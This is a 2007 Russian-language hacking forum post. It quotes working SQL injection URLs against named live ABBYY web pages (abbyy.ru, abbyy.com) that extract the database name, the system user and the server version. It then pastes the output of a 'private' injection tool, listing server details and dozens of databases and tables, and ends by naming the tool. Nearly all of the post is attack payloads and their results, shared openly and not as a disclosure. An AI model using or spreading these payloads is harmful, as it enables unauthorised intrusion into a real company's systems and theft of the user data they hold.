
02.09.2007, 23:41
|
|
Познающий
Регистрация: 17.10.2006
Сообщений: 83
Провел на форуме: 552846
Репутация:
55
|
|
Сообщение от [53x]Shadow
ABBYY
Код:
http://www.abbyy.ru/press/press_releases.asp?param=-1+or+1=(select+db_name())--
http://www.abbyy.ru/sdk/?param=-1+or+1=(select+system_user)--
http://www.abbyy.com/press/press_releases.asp?param=136693+or+1=@@version--
Есть таблица user
продолжение
Код:
SQL Injection Private Exploit
System user: publishing
Database name: Publishing
Server name: SQL2
IS Sysadmin ? : 0
User databases number: 43
User tables count in curent DB: 461
Permission to create tables: Yes
SQL Server version: 2000
Windows version: 2003
referendum
participantsInfo
FineReaderSprintForm
current_situation
lingvo_interface_voting
Anketa_sdk
Seminar2005
Anketa_PDFTransformer_rus
lingvoMabileDevisesTesting
FineReaderForm
voting_lingvo_cards
Anketa_FineReaderHomeEdition
goroda_users_words
voting_lingvo_sound
voting_abbyy_ru
dtproperties
FR67_Trial_User_Survey_USA
DealersForm
voting_lingvo_search
Anketa_FineReaderHomeEdition_2
FR8_User_Survey_USA
voting_abbyy_com
DB_Export
FR8_Trial_User_Survey_USA
syssegments
questions_list
Digital_Camera_OCR
Anketa_FineReaderSprint
lingvo_valentine
voting_lingvo_default_page
Anketa_AbbyyRuHelpPoll
FinereaderPRO8_Requests
lingvoMobileDevicesTesting
Anketa_PDFTransformer_1
Anketa_PDFTransformer_2
subscribes_partner_portal
promo_beaver_action
sysconstraints
Anketa_STO_1
USA_PartnersRegistration
voting_metro_lingvo_adv
Lingvo_forum_1_3
Lingvo_forum_next
certification
msdb
abbyyru_FRCE90
LingvoBannersTracking
ReportServer
Dialog_Forum_new
voting
Lingvo_RegistrationNY
tempdb
Lingvo_Forum_new
docflow_referendum
Docflow_Forum
LingvoDA_Forum
covercd
AdventureWorks2000
abbyycom_PDFTransformer
FormReader_Forms
LingvoDa_Forum_new
IPDatabase
WebStats
dialog21_referendum
ReportServerTempDB
FineReader_forum_R
master
Lingvo_Forum
tsla
review
docflow
subscribe
lingvoDa_Dictionaries
QuotGame
LPDatabase
model
Dialog_Forum
KnowledgeBase
SuccessStories_test
Docflow_Forum_new
Publishing
TrialForms
pubs
SuccessStories
ForumDialog_1_3
SuccessStories2
LingvoDA_referendum
docflow_registration
результат
xena military private sql injection exploit v2.0
Последний раз редактировалось _Great_; 04.09.2007 в 15:20..
Причина: километровым шрифтом писать не пробовал?
|
|
|